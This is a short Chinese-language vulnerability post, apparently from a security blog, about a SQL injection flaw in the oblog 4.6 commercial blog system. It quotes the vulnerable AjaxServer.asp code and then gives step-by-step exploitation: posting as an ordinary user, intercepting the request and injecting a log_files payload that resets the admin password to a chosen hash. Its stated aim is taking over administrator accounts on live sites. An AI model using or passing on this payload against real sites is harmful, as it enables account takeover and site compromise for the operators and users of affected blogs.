oblog商业版本4.6注射漏洞,直接拿管理员

影响版本:4.6商业版
发现人:雕牌
来源:http://52cmd.cn

漏洞描述:
通过构造特定的语句,可以更改任何用户的密码,包括管理员,严重级漏洞。

漏洞文件:AjaxServer.asp
变量:log_files
语句:log_files=Replace(log_files," ","")
If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)
rs("logpics") = log_files
'附加文件处理
If log_files <>"" Then
oblog.Execute "Update oblog_upfile Set logid=" & tid & " Where fileid In (" & log_files & ")"
End if
'Tag处理

利用:
首先找到使用sql版本的系统注册用户test,发表新日志,同时抓包, 修改log_files。2);update/**/oblog_user/**/set/**/password=7a57a5a743894a0e/**/where/**/username=admin;–
关于怎么区别sql和access的版本,目前也没发现好的方法,但是可以通过查看ver.asp文件看到当前版本号。某些版本好象没这文件。 官方好象出补丁了。很多blog门户站都是用的sql的版本,大家就悠着点吧。

相关日志

发表评论